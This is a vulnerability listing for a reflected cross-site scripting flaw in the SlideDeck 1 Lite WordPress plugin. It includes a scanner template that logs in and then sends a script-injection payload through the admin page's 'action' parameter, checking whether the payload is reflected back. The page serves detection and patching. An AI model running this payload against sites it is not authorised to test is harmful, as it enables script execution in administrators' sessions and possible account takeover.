CVE-2024-13224: SlideDeck 1 Lite Content Slider - Cross-Site Scripting

2026-02-24 SlideDeck 1 Lite Content Slider PoC Public

Description

SlideDeck 1 Lite Content Slider WordPress plugin <= 1.4.8 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.

PoC

id: CVE-2024-13224

info:
  name: SlideDeck 1 Lite Content Slider - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    SlideDeck 1 Lite Content Slider WordPress plugin <= 1.4.8 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/32a90907-e82f-41b3-b20e-d10a722e2999/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13224
    cwe-id: CWE-79
    epss-score: 0.00594
    epss-percentile: 0.46803
    cpe: cpe:2.3:a:dtelepathy:slidedeck_1_lite_content_slider:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dtelepathy
    product: slidedeck_1_lite_content_slider
  tags: cve,cve2024,wpscan,wp-plugin,dtelepathy,slidedeck-1-lite-content-slider

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=slidedeck.php/slidedeck_dynamic&action=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "></script><script>alert(document.domain)</script><script>", "dynamic_slidedeck_form")'
        condition: and
# digest: 4a0a0047304502201abd30c997f479f8f1d637c9d7939cd47337d0d0d819d73723c3cf30ac6ef1ef0221008fd6f4f6c9c8b6923ad3c2d18bc916239d17ba0cb54f640c3ad7e3040af5042b:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities